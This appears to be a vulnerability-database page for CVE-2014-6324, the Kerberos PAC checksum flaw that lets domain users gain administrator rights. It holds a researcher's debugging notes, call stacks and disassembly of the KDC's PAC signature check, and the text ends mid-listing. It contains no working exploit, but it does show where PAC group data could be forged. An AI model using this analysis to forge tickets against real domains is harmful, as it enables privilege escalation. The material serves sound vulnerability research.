Attacker Value
Unknown
(2 users assessed)
Exploitability
Unknown
(2 users assessed)
User Interaction
Unknown
Privileges Required
Unknown
Attack Vector
Unknown
1

CVE-2014-6324 - Microsoft Kerberos Checksum Validation Vulnerability

Disclosure Date: November 18, 2014
Exploited in the Wild
Reported by gwillcox-r7
Add MITRE ATT&CK tactics and techniques that apply to this CVE.

Description

The Kerberos Key Distribution Center (KDC) in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 allows remote authenticated domain users to obtain domain administrator privileges via a forged signature in a ticket, as exploited in the wild in November 2014, aka “Kerberos Checksum Vulnerability.”

Add Assessment

2
Technical Analysis

Troubleshooting kerberos on windows

Golden and silver ticket

About PAC:

MS-PAC: Privilege Attribute Certificate Data Structure
http://msdn.microsoft.com/en-us/library/cc237917.aspx

Microsoft Authorization Data Specification
http://mirror.die.net/banned/microsoft-kerberos-extensions.html

Authentication structures:

http://msdn.microsoft.com/en-us/library/windows/desktop/aa378120(v=vs.85).aspx

More Kerberos fun with PAC’s- decrypt the PAC

http://i1.blogs.msdn.com/b/spatdsg/archive/2009/03/26/more-kerberos-fun-with-pac-s.aspx

Kerberos PAC Validation… what is it?

http://blogs.msdn.com/b/spatdsg/archive/2007/03/07/pac-validation.aspx

Kerberos on windows

https://www.blackhat.com/presentations/bh-europe-09/Bouillon/BlackHat-Europe-09-Bouillon-Taming-the-Beast-Kerberous-whitepaper.pdf
http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos

Notes

  • Windows 2003: Security Event ids related to kerberos 540 (logon) / 538 (logoff)
  • I’m pretty sure the information to forge exists inside service kerberos ticket
  • On my opinion the idea is to forge the KERB_VALIDATION_INFO. It contains:
ULONG GroupCount;
[size_is(GroupCount)] PGROUP_MEMBERSHIP GroupIds;

Where:

  typedef struct _GROUP_MEMBERSHIP {
      ULONG RelativeId;
      ULONG Attributes;
  } *PGROUP_MEMBERSHIP;

By modifying the RelativeId in the service ticket, I think is the way related
to the privilege escalation (See ticket_samples.txt for KERB_VALIDATION_INFO dump)

But… how to tamper that information? Since the kerberos communication (server
running on 88/udp) happens through lsass (running as system), tampering communications
doesn’t look a good idea. Even worse, the KERB_VALIDATION_INFO is located inside the
ticket, which travels encrypted. I NEED TO CHECK, CAREFULLY WHERE THE PAC IS ADDED,
HOPEFULLY, IT’S IN A BLOG CIPHERED WITH THE USER PRIVATE KEY. CANNOR REMIND JUST NOW, TODO!

Just remembering cached tickets maybe can be tampered TODO:review

Breakpoints:

bp kdcsvc!I_GetAsTicket ".echo I_GetAsTicket; g"

Reachecd through _KdcGetTicket (also an export)

bp kdcsvc!KdcVerifyPacSignature ".echo KdcVerifyPacSignature; g"

This one is reached from when handling TGT Requests, aparently

HandleTGSRequest –> GetTGSTicket…

bp kdcsvc!KdcVerifyPac ".echo KdcVerifyPac; g"

It’s an export, also reached through “CredentialUpdateFree”

When I authenticate to a service, IIS, through Kerberos, it’s the call sequence:

I_GetAsTicket
KdcVerifyPacSignature
KdcVerifyPacSignature
I_GetAsTicket
KdcVerifyPacSignature

Okay, come on to check, what happens when I add the kerberos function:

kd> bp kerberos!KerbVerifyPacsignature ".echo kerberos!KerbVerifyPacsignature; g"
kd> g
I_GetAsTicket
KdcVerifyPacSignature
kerberos!KerbVerifyPacsignature
I_GetAsTicket
KdcVerifyPacSignature
kerberos!KerbVerifyPacsignature

Makes sense! Come on to check some call stacks to check where things come from:

kd> bl
 0 e 63a8b814     0001 (0001) KDCSVC!I_GetASTicket ".echo I_GetAsTicket; kb 4; g"
 1 e 63a89013     0001 (0001) KDCSVC!KdcVerifyPacSignature ".echo KdcVerifyPacSignature; kb 4; g"
 2 e 63a8d3ad     0001 (0001) KDCSVC!KdcVerifyPac ".echo KdcVerifyPac; kb 4; g"
 3 e 71ca8587     0001 (0001) kerberos!KerbVerifyPacSignature ".echo kerberos!KerbVerifyPacsignature; kb 4; g"

_GetAsTicket

ChildEBP RetAddr  Args to Child
04e4fe38 63a8b80a 050ae688 001583e8 04e4feb0 KDCSVC!I_GetASTicket
04e4fed8 63a87305 00000000 050ae688 001149a8 KDCSVC!KdcGetTicket+0x1b5
04e4ff38 71fd1700 0015b9e0 00000137 00000000 KDCSVC!KdcAtqDgIoCompletion+0x129
04e4ff58 71fd1858 00000137 00000000 0015b9e4 NTDSATQ!ATQ_CONTEXT::IOCompletion+0x31

KdcVerifyPacSignature

ChildEBP RetAddr  Args to Child
04e4f740 63a89f6f 00145238 04e4f91c 00000250 KDCSVC!KdcVerifyPacSignature
04e4f770 63a89543 00145238 000ec8f0 04e4f91c KDCSVC!KdcVerifyAndResignPac+0xb3
04e4f83c 63a87125 04e4f880 04e4fe74 00000000 KDCSVC!KdcInsertAuthorizationData+0x1d6
04e4f99c 63a85055 000ec8f0 04e4fea0 04e4fe98 KDCSVC!I_GetTGSTicket+0x729
kerberos!KerbVerifyPacsignature
ChildEBP RetAddr  Args to Child
00aef7b8 71cb1ef3 00aefa70 0013d8f0 00000250 kerberos!KerbVerifyPacSignature
00aef8fc 71cb1159 00000001 00aefab0 0017c1e8 kerberos!KerbCreateTokenFromTicket+0x1de
00aefaec 4ab860d2 0016cce0 00000000 3c9b6229 kerberos!SpAcceptLsaModeContext+0xb09
00aefb60 4abc94a8 00aefc18 00aefbf8 00aefbe0 LSASRV!WLsaAcceptContext+0x139

I_GetAsTicket

ChildEBP RetAddr  Args to Child
04e4fe38 63a8b80a 050b73b8 001583e8 04e4feb0 KDCSVC!I_GetASTicket
04e4fed8 63a87305 00000000 050b73b8 001149a8 KDCSVC!KdcGetTicket+0x1b5
04e4ff38 71fd1700 0015bc10 00000137 00000000 KDCSVC!KdcAtqDgIoCompletion+0x129
04e4ff58 71fd1858 00000137 00000000 0015bc14 NTDSATQ!ATQ_CONTEXT::IOCompletion+0x31

KdcVerifyPacSignature

ChildEBP RetAddr  Args to Child
04e4f740 63a89f6f 00145418 04e4f91c 00000250 KDCSVC!KdcVerifyPacSignature
04e4f770 63a89543 00145418 000ec8f0 04e4f91c KDCSVC!KdcVerifyAndResignPac+0xb3
04e4f83c 63a87125 04e4f880 04e4fe74 00000000 KDCSVC!KdcInsertAuthorizationData+0x1d6
04e4f99c 63a85055 000ec8f0 04e4fea0 04e4fe98 KDCSVC!I_GetTGSTicket+0x729
kerberos!KerbVerifyPacsignature
ChildEBP RetAddr  Args to Child
00c6f7b8 71cb1ef3 00c6fa70 0013d8f0 00000250 kerberos!KerbVerifyPacSignature
00c6f8fc 71cb1159 00000001 00c6fab0 0017c190 kerberos!KerbCreateTokenFromTicket+0x1de
00c6faec 4ab860d2 0016cce0 00000000 3f4a60da kerberos!SpAcceptLsaModeContext+0xb09
00c6fb60 4abc94a8 00c6fc18 00c6fbf8 00c6fbe0 LSASRV!WLsaAcceptContext+0x139

So, obviously I_GetAsTicket is called through the first query (AS), KdcVerifyPacSignature and
kerberos!KerbVerifyPacsignature is called on the second request (TGT). Looks like the PAC is
parsed/verified in the second query (TGT, makes sense).

[*] Other backtraces for my review while logging in the domain from XP SP3 client

kd> g
Breakpoint 4 hit
kerberos!PAC_UnMarshal:
001b:71d2d109 8bff            mov     edi,edi
kd> kb
ChildEBP RetAddr  Args to Child
009cf980 71d17acb 000b8780 00000290 009cfd84 kerberos!PAC_UnMarshal
009cf9fc 71d02dcb 000fbd18 009cfc34 000d62b8 kerberos!KerbCreateTokenFromLogonTicket+0x2ec
009cfc8c 75757814 009cfea8 00000002 000d62b8 kerberos!LsaApLogonUserEx2+0xa9e
009cfcf8 75742941 009cfea8 00000002 000e23c8 LSASRV!NegLogonUserEx2+0x21d
009cfe98 75742286 009cfea8 000b6040 00107500 LSASRV!LsapAuApiDispatchLogonUser+0x335
009cfeac 75739429 00107500 000b4e90 000b6040 LSASRV!LpcLsaLogonUser+0x22
009cfec4 7573934d 00107500 757cf738 000c7968 LSASRV!DispatchAPI+0x46
009cff50 75738ca2 000b4e90 009cff98 7c809c55 LSASRV!LpcHandler+0x153
009cff74 75738d66 0009bd98 00000000 00a4fab0 LSASRV!SpmPoolThreadBase+0xb9
009cffb4 7c80b713 000c34e0 00000000 00a4fab0 LSASRV!LsapThreadBase+0x91
009cffec 00000000 75738d13 000c34e0 00000000 kernel32!BaseThreadStart+0x37
kd> g
Breakpoint 5 hit
kerberos!PAC_ReMarshal:
001b:71d2d188 8bff            mov     edi,edi
kd> kb
ChildEBP RetAddr  Args to Child
009cf89c 71d15b25 000b8780 00000290 009cf9cc kerberos!PAC_ReMarshal
009cf96c 71d17b42 009cf9c4 000b8780 00000290 kerberos!KerbVerifyPacSignature+0x185
009cf9fc 71d02dcb 000fbd18 009cfc34 000d62b8 kerberos!KerbCreateTokenFromLogonTicket+0x363
009cfc8c 75757814 009cfea8 00000002 000d62b8 kerberos!LsaApLogonUserEx2+0xa9e
009cfcf8 75742941 009cfea8 00000002 000e23c8 LSASRV!NegLogonUserEx2+0x21d
009cfe98 75742286 009cfea8 000b6040 00107500 LSASRV!LsapAuApiDispatchLogonUser+0x335
009cfeac 75739429 00107500 000b4e90 000b6040 LSASRV!LpcLsaLogonUser+0x22
009cfec4 7573934d 00107500 757cf738 000c7968 LSASRV!DispatchAPI+0x46
009cff50 75738ca2 000b4e90 009cff98 7c809c55 LSASRV!LpcHandler+0x153
009cff74 75738d66 0009bd98 00000000 00a4fab0 LSASRV!SpmPoolThreadBase+0xb9
009cffb4 7c80b713 000c34e0 00000000 00a4fab0 LSASRV!LsapThreadBase+0x91
009cffec 00000000 75738d13 000c34e0 00000000 kernel32!BaseThreadStart+0x37
kd> g
Breakpoint 4 hit
kerberos!PAC_UnMarshal:
001b:71d2d109 8bff            mov     edi,edi
kd> kb
ChildEBP RetAddr  Args to Child
009cf89c 71d15c04 000b8780 00000290 009cf9cc kerberos!PAC_UnMarshal
009cf96c 71d17b42 009cf9c4 000b8780 00000290 kerberos!KerbVerifyPacSignature+0x264
009cf9fc 71d02dcb 000fbd18 009cfc34 000d62b8 kerberos!KerbCreateTokenFromLogonTicket+0x363
009cfc8c 75757814 009cfea8 00000002 000d62b8 kerberos!LsaApLogonUserEx2+0xa9e
009cfcf8 75742941 009cfea8 00000002 000e23c8 LSASRV!NegLogonUserEx2+0x21d
009cfe98 75742286 009cfea8 000b6040 00107500 LSASRV!LsapAuApiDispatchLogonUser+0x335
009cfeac 75739429 00107500 000b4e90 000b6040 LSASRV!LpcLsaLogonUser+0x22
009cfec4 7573934d 00107500 757cf738 000c7968 LSASRV!DispatchAPI+0x46
009cff50 75738ca2 000b4e90 009cff98 7c809c55 LSASRV!LpcHandler+0x153
009cff74 75738d66 0009bd98 00000000 00a4fab0 LSASRV!SpmPoolThreadBase+0xb9
009cffb4 7c80b713 000c34e0 00000000 00a4fab0 LSASRV!LsapThreadBase+0x91
009cffec 00000000 75738d13 000c34e0 00000000 kernel32!BaseThreadStart+0x37
kd> g
Breakpoint 1 hit
kerberos!PAC_UnmarshallValidationInfo:
001b:71d2d466 8bff            mov     edi,edi
kd> kb
ChildEBP RetAddr  Args to Child
009cf898 71d15cd6 009cf9f0 000b87c8 000001f0 kerberos!PAC_UnmarshallValidationInfo
009cf96c 71d17b42 009cf9c4 000b8780 00000290 kerberos!KerbVerifyPacSignature+0x336
009cf9fc 71d02dcb 000fbd18 009cfc34 000d62b8 kerberos!KerbCreateTokenFromLogonTicket+0x363
009cfc8c 75757814 009cfea8 00000002 000d62b8 kerberos!LsaApLogonUserEx2+0xa9e
009cfcf8 75742941 009cfea8 00000002 000e23c8 LSASRV!NegLogonUserEx2+0x21d
009cfe98 75742286 009cfea8 000b6040 00107500 LSASRV!LsapAuApiDispatchLogonUser+0x335
009cfeac 75739429 00107500 000b4e90 000b6040 LSASRV!LpcLsaLogonUser+0x22
009cfec4 7573934d 00107500 757cf738 000c7968 LSASRV!DispatchAPI+0x46
009cff50 75738ca2 000b4e90 009cff98 7c809c55 LSASRV!LpcHandler+0x153
009cff74 75738d66 0009bd98 00000000 00a4fab0 LSASRV!SpmPoolThreadBase+0xb9
009cffb4 7c80b713 000c34e0 00000000 00a4fab0 LSASRV!LsapThreadBase+0x91
009cffec 00000000 75738d13 000c34e0 00000000 kernel32!BaseThreadStart+0x37
kd> g
Breakpoint 3 hit
kerberos!PAC_DecodeValidationInformation:
001b:71d2cf2e 6a14            push    14h
kd> kb
ChildEBP RetAddr  Args to Child
009cf884 71d2d47d 000b87c8 000001f0 009cf9f0 kerberos!PAC_DecodeValidationInformation
009cf898 71d15cd6 009cf9f0 000b87c8 000001f0 kerberos!PAC_UnmarshallValidationInfo+0x17
009cf96c 71d17b42 009cf9c4 000b8780 00000290 kerberos!KerbVerifyPacSignature+0x336
009cf9fc 71d02dcb 000fbd18 009cfc34 000d62b8 kerberos!KerbCreateTokenFromLogonTicket+0x363
009cfc8c 75757814 009cfea8 00000002 000d62b8 kerberos!LsaApLogonUserEx2+0xa9e
009cfcf8 75742941 009cfea8 00000002 000e23c8 LSASRV!NegLogonUserEx2+0x21d
009cfe98 75742286 009cfea8 000b6040 00107500 LSASRV!LsapAuApiDispatchLogonUser+0x335
009cfeac 75739429 00107500 000b4e90 000b6040 LSASRV!LpcLsaLogonUser+0x22
009cfec4 7573934d 00107500 757cf738 000c7968 LSASRV!DispatchAPI+0x46
009cff50 75738ca2 000b4e90 009cff98 7c809c55 LSASRV!LpcHandler+0x153
009cff74 75738d66 0009bd98 00000000 00a4fab0 LSASRV!SpmPoolThreadBase+0xb9
009cffb4 7c80b713 000c34e0 00000000 00a4fab0 LSASRV!LsapThreadBase+0x91
009cffec 00000000 75738d13 000c34e0 00000000 kernel32!BaseThreadStart+0x37
kd> g
Breakpoint 8 hit
kerberos!PPAC_IDL_VALIDATION_INFO_Decode:
001b:71d2d6f5 8bff            mov     edi,edi
kd> kb
ChildEBP RetAddr  Args to Child
009cf844 71d2cf7f 000936f0 009cf9f0 000b89c0 kerberos!PPAC_IDL_VALIDATION_INFO_Decode
009cf884 71d2d47d 000b87c8 000001f0 009cf9f0 kerberos!PAC_DecodeValidationInformation+0x51
009cf898 71d15cd6 009cf9f0 000b87c8 000001f0 kerberos!PAC_UnmarshallValidationInfo+0x17
009cf96c 71d17b42 009cf9c4 000b8780 00000290 kerberos!KerbVerifyPacSignature+0x336
009cf9fc 71d02dcb 000fbd18 009cfc34 000d62b8 kerberos!KerbCreateTokenFromLogonTicket+0x363
009cfc8c 75757814 009cfea8 00000002 000d62b8 kerberos!LsaApLogonUserEx2+0xa9e
009cfcf8 75742941 009cfea8 00000002 000e23c8 LSASRV!NegLogonUserEx2+0x21d
009cfe98 75742286 009cfea8 000b6040 00107500 LSASRV!LsapAuApiDispatchLogonUser+0x335
009cfeac 75739429 00107500 000b4e90 000b6040 LSASRV!LpcLsaLogonUser+0x22
009cfec4 7573934d 00107500 757cf738 000c7968 LSASRV!DispatchAPI+0x46
009cff50 75738ca2 000b4e90 009cff98 7c809c55 LSASRV!LpcHandler+0x153
009cff74 75738d66 0009bd98 00000000 00a4fab0 LSASRV!SpmPoolThreadBase+0xb9
009cffb4 7c80b713 000c34e0 00000000 00a4fab0 LSASRV!LsapThreadBase+0x91
009cffec 00000000 75738d13 000c34e0 00000000 kernel32!BaseThreadStart+0x37
kd> g

[*] More breakpoints when from XP SP3 client: Looks like there are two paths, to
get the TGT ticket, and to get the service ticket. The last one is the interesting
I think.

kd> kb
ChildEBP RetAddr  Args to Child
0007f4c0 71cfbc26 00103828 000ed248 000c2f48 kerberos!KerbCacheTicket
0007f68c 71cf3611 00101ce0 000f6c30 00000000 kerberos!KerbGetAuthenticationTicket+0xa77
0007f760 71cf33c8 00101ce0 000f6c30 00000000 kerberos!KerbGetTicketGrantingTicket+0x2f4
0007f794 71cf1db1 00000000 000f6c30 00000000 kerberos!KerbGetTicketForCredential+0x5d
0007f7f4 71cf2d85 000f6c30 80000002 00000000 kerberos!KerbReferenceCredential+0x12a
0007f9a8 7573c293 000f6c30 00000000 0007fe80 kerberos!SpInitLsaModeContext+0xae3
0007fa20 7573ca9a 0007fbb0 0007fb90 0007fe80 LSASRV!WLsaInitContext+0x154
0007fc14 7575dedc 00000000 000a5ad8 0007fe80 LSASRV!NegBuildRequestToken+0x53d
0007fc48 7575de92 00108ef0 0007fe80 00000002 LSASRV!NegGenerateInitialToken+0x28
0007fcac 7573c293 00108ef0 00000000 0007fe80 LSASRV!NegInitLsaModeContext+0x3e6
0007fd24 7573c17c 000f9bf8 000f9c00 0007fe80 LSASRV!WLsaInitContext+0x154
0007feac 75739429 000f9bd0 000b5100 000f9ce0 LSASRV!LpcInitContext+0x1a2
0007fec4 7573934d 000f9bd0 757cf738 0009af50 LSASRV!DispatchAPI+0x46
0007ff50 75738ca2 000b5100 0007ff98 7c809c55 LSASRV!LpcHandler+0x153
0007ff74 75738d66 0009bd98 00000000 00a4fab0 LSASRV!SpmPoolThreadBase+0xb9
0007ffb4 7c80b713 000d3758 00000000 00a4fab0 LSASRV!LsapThreadBase+0x91
0007ffec 00000000 75738d13 000d3758 00000000 kernel32!BaseThreadStart+0x37
kd> g
Breakpoint 13 hit
kerberos!KerbCacheTicket:
001b:71cf9a79 8bff            mov     edi,edi
kd> kb
ChildEBP RetAddr  Args to Child
0007f6ec 71cf9a6f 00103818 000d5240 000c2f48 kerberos!KerbCacheTicket
0007f7cc 71cf722e 00101ce0 000f6c30 00000000 kerberos!KerbGetServiceTicket+0x893
0007f9a8 7573c293 00000002 00000000 0007fe80 kerberos!SpInitLsaModeContext+0xd60
0007fa20 7573ca9a 0007fbb0 0007fb90 0007fe80 LSASRV!WLsaInitContext+0x154
0007fc14 7575dedc 00000000 000a5ad8 0007fe80 LSASRV!NegBuildRequestToken+0x53d
0007fc48 7575de92 00108ef0 0007fe80 00000002 LSASRV!NegGenerateInitialToken+0x28
0007fcac 7573c293 00108ef0 00000000 0007fe80 LSASRV!NegInitLsaModeContext+0x3e6
0007fd24 7573c17c 000f9bf8 000f9c00 0007fe80 LSASRV!WLsaInitContext+0x154
0007feac 75739429 000f9bd0 000b5100 000f9ce0 LSASRV!LpcInitContext+0x1a2
0007fec4 7573934d 000f9bd0 757cf738 0009af50 LSASRV!DispatchAPI+0x46
0007ff50 75738ca2 000b5100 0007ff98 7c809c55 LSASRV!LpcHandler+0x153
0007ff74 75738d66 0009bd98 00000000 00a4fab0 LSASRV!SpmPoolThreadBase+0xb9
0007ffb4 7c80b713 000d3758 00000000 00a4fab0 LSASRV!LsapThreadBase+0x91
0007ffec 00000000 75738d13 000d3758 00000000 kernel32!BaseThreadStart+0x37
kd> g

Reaching the important point on my case:

kd> uf KDCSVC!KdcVerifyPacSignature
KDCSVC!KdcVerifyPacSignature:
63a89013 8bff            mov     edi,edi
63a89015 55              push    ebp
63a89016 8bec            mov     ebp,esp
63a89018 81eca8000000    sub     esp,0A8h
63a8901e a10010ab63      mov     eax,dword ptr [KDCSVC!__security_cookie (63ab1000)]
63a89023 53              push    ebx
63a89024 56              push    esi
63a89025 8b7514          mov     esi,dword ptr [ebp+14h]
63a89028 8945fc          mov     dword ptr [ebp-4],eax
63a8902b 8b4508          mov     eax,dword ptr [ebp+8]
63a8902e 57              push    edi
63a8902f 8945ac          mov     dword ptr [ebp-54h],eax
63a89032 8b450c          mov     eax,dword ptr [ebp+0Ch]
63a89035 6a0f            push    0Fh
63a89037 33db            xor     ebx,ebx
63a89039 8945a8          mov     dword ptr [ebp-58h],eax
63a8903c 59              pop     ecx
63a8903d ff7510          push    dword ptr [ebp+10h]
63a89040 66899d58ffffff  mov     word ptr [ebp-0A8h],bx
63a89047 33c0            xor     eax,eax
63a89049 8dbd5affffff    lea     edi,[ebp-0A6h]
63a8904f f3ab            rep stos dword ptr es:[edi]
63a89051 56              push    esi
63a89052 8975b0          mov     dword ptr [ebp-50h],esi
63a89055 895dbc          mov     dword ptr [ebp-44h],ebx
63a89058 895db8          mov     dword ptr [ebp-48h],ebx
63a8905b 895db4          mov     dword ptr [ebp-4Ch],ebx
63a8905e 66ab            stos    word ptr es:[edi]
63a89060 e81feeffff      call    KDCSVC!PAC_UnMarshal (63a87e84)
63a89065 85c0            test    eax,eax
63a89067 0f84178d0000    je      KDCSVC!KdcVerifyPacSignature+0x261 (63a91d84)

KDCSVC!KdcVerifyPacSignature+0x5a:
63a8906d 8d8558ffffff    lea     eax,[ebp-0A8h]
63a89073 50              push    eax
63a89074 b92810ab63      mov     ecx,offset KDCSVC!SecData (63ab1028)
63a89079 e8668bffff      call    KDCSVC!CSecurityData::GetKrbtgtTicketInfo (63a81be4)
63a8907e 3bc3            cmp     eax,ebx
63a89080 8945bc          mov     dword ptr [ebp-44h],eax
63a89083 0f856c8c0000    jne     KDCSVC!KdcVerifyPacSignature+0x72 (63a91cf5)

KDCSVC!KdcVerifyPacSignature+0x7d:
63a89089 53              push    ebx
63a8908a 6a06            push    6
63a8908c 56              push    esi
63a8908d e846ecffff      call    KDCSVC!PAC_Find (63a87cd8)
63a89092 8bd8            mov     ebx,eax
63a89094 85db            test    ebx,ebx
63a89096 0f8488010000    je      KDCSVC!KdcVerifyPacSignature+0x2d1 (63a89224)

KDCSVC!KdcVerifyPacSignature+0x90:
63a8909c 8b4b04          mov     ecx,dword ptr [ebx+4]
63a8909f 83f904          cmp     ecx,4
63a890a2 0f827c010000    jb      KDCSVC!KdcVerifyPacSignature+0x2d1 (63a89224)

KDCSVC!KdcVerifyPacSignature+0x9c:
63a890a8 8b4308          mov     eax,dword ptr [ebx+8]
63a890ab 83c1fc          add     ecx,0FFFFFFFCh
63a890ae 8d5004          lea     edx,[eax+4]
63a890b1 894598          mov     dword ptr [ebp-68h],eax
63a890b4 8bc1            mov     eax,ecx
63a890b6 c1e902          shr     ecx,2
63a890b9 8bf2            mov     esi,edx
63a890bb 8d7de8          lea     edi,[ebp-18h]
63a890be f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
63a890c0 8bc8            mov     ecx,eax
63a890c2 83e103          and     ecx,3
63a890c5 f3a4            rep movs byte ptr es:[edi],byte ptr [esi]
63a890c7 8b4b04          mov     ecx,dword ptr [ebx+4]
63a890ca 83e904          sub     ecx,4
63a890cd 8bfa            mov     edi,edx
63a890cf 8bd1            mov     edx,ecx
63a890d1 c1e902          shr     ecx,2
63a890d4 33c0            xor     eax,eax
63a890d6 f3ab            rep stos dword ptr es:[edi]
63a890d8 6a00            push    0
63a890da 8bca            mov     ecx,edx
63a890dc 6a07            push    7
63a890de ff75b0          push    dword ptr [ebp-50h]
63a890e1 83e103          and     ecx,3
63a890e4 f3aa            rep stos byte ptr es:[edi]
63a890e6 e8edebffff      call    KDCSVC!PAC_Find (63a87cd8)
63a890eb 85c0            test    eax,eax
63a890ed 89459c          mov     dword ptr [ebp-64h],eax
63a890f0 0f842e010000    je      KDCSVC!KdcVerifyPacSignature+0x2d1 (63a89224)

KDCSVC!KdcVerifyPacSignature+0xea:
63a890f6 8b5004          mov     edx,dword ptr [eax+4]
63a890f9 83fa04          cmp     edx,4
63a890fc 0f8222010000    jb      KDCSVC!KdcVerifyPacSignature+0x2d1 (63a89224)

KDCSVC!KdcVerifyPacSignature+0xf6:
63a89102 8b4808          mov     ecx,dword ptr [eax+8]
63a89105 8d7104          lea     esi,[ecx+4]
63a89108 894da0          mov     dword ptr [ebp-60h],ecx
63a8910b 8d4afc          lea     ecx,[edx-4]
63a8910e 8bd1            mov     edx,ecx
63a89110 c1e902          shr     ecx,2
63a89113 ff7510          push    dword ptr [ebp+10h]
63a89116 8975a4          mov     dword ptr [ebp-5Ch],esi
63a89119 ff75b0          push    dword ptr [ebp-50h]
63a8911c 8d7dc0          lea     edi,[ebp-40h]
63a8911f f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
63a89121 8bca            mov     ecx,edx
63a89123 83e103          and     ecx,3
63a89126 f3a4            rep movs byte ptr es:[edi],byte ptr [esi]
63a89128 8b4804          mov     ecx,dword ptr [eax+4]
63a8912b 8b7da4          mov     edi,dword ptr [ebp-5Ch]
63a8912e 83e904          sub     ecx,4
63a89131 8bd1            mov     edx,ecx
63a89133 c1e902          shr     ecx,2
63a89136 33c0            xor     eax,eax
63a89138 f3ab            rep stos dword ptr es:[edi]
63a8913a 8bca            mov     ecx,edx
63a8913c 83e103          and     ecx,3
63a8913f f3aa            rep stos byte ptr es:[edi]
63a89141 e810e5ffff      call    KDCSVC!PAC_ReMarshal (63a87656)
63a89146 84c0            test    al,al
63a89148 0f84d6000000    je      KDCSVC!KdcVerifyPacSignature+0x2d1 (63a89224)

KDCSVC!KdcVerifyPacSignature+0x142:
63a8914e 8d45b8          lea     eax,[ebp-48h]
63a89151 50              push    eax
63a89152 8b4598          mov     eax,dword ptr [ebp-68h]
63a89155 ff30            push    dword ptr [eax]
63a89157 e8538affff      call    KDCSVC!CDLocateCheckSum (63a81baf)
63a8915c 85c0            test    eax,eax
63a8915e 0f8ce38b0000    jl      KDCSVC!KdcVerifyPacSignature+0x224 (63a91d47)

KDCSVC!KdcVerifyPacSignature+0x158:
63a89164 8b55b8          mov     edx,dword ptr [ebp-48h]
63a89167 837a0414        cmp     dword ptr [edx+4],14h // DEBUG HERE IS THE ORIGINAL PATCH
63a8916b 0f87138c0000    ja      KDCSVC!KdcVerifyPacSignature+0x261 (63a91d84)

KDCSVC!KdcVerifyPacSignature+0x165:
63a89171 8b4a20          mov     ecx,dword ptr [edx+20h]
63a89174 85c9            test    ecx,ecx
63a89176 8d45b4          lea     eax,[ebp-4Ch]
63a89179 50              push    eax
63a8917a 6a11            push    11h
63a8917c 0f857e8b0000    jne     KDCSVC!KdcVerifyPacSignature+0x172 (63a91d00)

KDCSVC!KdcVerifyPacSignature+0x183:
63a89182 8b45ac          mov     eax,dword ptr [ebp-54h]
63a89185 ff7004          push    dword ptr [eax+4]
63a89188 ff7008          push    dword ptr [eax+8]
63a8918b ff521c          call    dword ptr [edx+1Ch]

KDCSVC!KdcVerifyPacSignature+0x18f:
63a8918e 85c0            test    eax,eax
63a89190 0f8cee8b0000    jl      KDCSVC!KdcVerifyPacSignature+0x261 (63a91d84)

KDCSVC!KdcVerifyPacSignature+0x197:
63a89196 ff75b0          push    dword ptr [ebp-50h]
63a89199 8b45b8          mov     eax,dword ptr [ebp-48h]
63a8919c ff7510          push    dword ptr [ebp+10h]
63a8919f ff75b4          push    dword ptr [ebp-4Ch]
63a891a2 ff5010          call    dword ptr [eax+10h]
63a891a5 8d45d4          lea     eax,[ebp-2Ch]
63a891a8 50              push    eax
63a891a9 ff75b4          push    dword ptr [ebp-4Ch]
63a891ac 8b45b8          mov     eax,dword ptr [ebp-48h]
63a891af ff5014          call    dword ptr [eax+14h]
63a891b2 8d45b4          lea     eax,[ebp-4Ch]
63a891b5 50              push    eax
63a891b6 8b45b8          mov     eax,dword ptr [ebp-48h]
63a891b9 ff5018          call    dword ptr [eax+18h]
63a891bc 8b45b8          mov     eax,dword ptr [ebp-48h]
63a891bf 8b4804          mov     ecx,dword ptr [eax+4]
63a891c2 8b4304          mov     eax,dword ptr [ebx+4]
63a891c5 83e804          sub     eax,4
63a891c8 3bc8            cmp     ecx,eax
63a891ca 754e            jne     KDCSVC!KdcVerifyPacSignature+0x2ba (63a8921a)

KDCSVC!KdcVerifyPacSignature+0x1d1:
63a891cc 8d7de8          lea     edi,[ebp-18h]
63a891cf 8d75d4          lea     esi,[ebp-2Ch]
63a891d2 33c0            xor     eax,eax
63a891d4 f3a6            repe cmps byte ptr [esi],byte ptr es:[edi]
63a891d6 7542            jne     KDCSVC!KdcVerifyPacSignature+0x2ba (63a8921a)

KDCSVC!KdcVerifyPacSignature+0x1e1:
63a891d8 8b45a8          mov     eax,dword ptr [ebp-58h]
63a891db 817820f6010000  cmp     dword ptr [eax+20h],1F6h
63a891e2 0f852c8b0000    jne     KDCSVC!KdcVerifyPacSignature+0x1f1 (63a91d14)

KDCSVC!KdcVerifyPacSignature+0x2ee:
63a891e8 837dbc29        cmp     dword ptr [ebp-44h],29h
63a891ec 0f841e8c0000    je      KDCSVC!KdcVerifyPacSignature+0x2f4 (63a91e10)

KDCSVC!KdcVerifyPacSignature+0x340:
63a891f2 837db400        cmp     dword ptr [ebp-4Ch],0
63a891f6 5f              pop     edi
63a891f7 5e              pop     esi
63a891f8 5b              pop     ebx
63a891f9 0f85668c0000    jne     KDCSVC!KdcVerifyPacSignature+0x349 (63a91e65)

KDCSVC!KdcVerifyPacSignature+0x357:
63a891ff 8d8558ffffff    lea     eax,[ebp-0A8h]
63a89205 50              push    eax
63a89206 e8498cffff      call    KDCSVC!FreeTicketInfo (63a81e54)
63a8920b 8b4dfc          mov     ecx,dword ptr [ebp-4]
63a8920e 8b45bc          mov     eax,dword ptr [ebp-44h]
63a89211 e83f89ffff      call    KDCSVC!__security_check_cookie (63a81b55)
63a89216 c9              leave
63a89217 c21000          ret     10h

KDCSVC!KdcVerifyPacSignature+0x2ba:
63a8921a 683092a863      push    offset KDCSVC!`string' (63a89230)
63a8921f e9bb8b0000      jmp     KDCSVC!KdcVerifyPacSignature+0x2bf (63a91ddf)

KDCSVC!KdcVerifyPacSignature+0x2d1:
63a89224 c745bc3c000000  mov     dword ptr [ebp-44h],3Ch
63a8922b e9c18b0000      jmp     KDCSVC!KdcVerifyPacSignature+0x2d8 (63a91df1)

KDCSVC!KdcVerifyPacSignature+0x72:
63a91cf5 50              push    eax
63a91cf6 e884120100      call    KDCSVC!KerbMapKerbError (63aa2f7f)
63a91cfb e9f1000000      jmp     KDCSVC!KdcVerifyPacSignature+0x2d8 (63a91df1)

KDCSVC!KdcVerifyPacSignature+0x172:
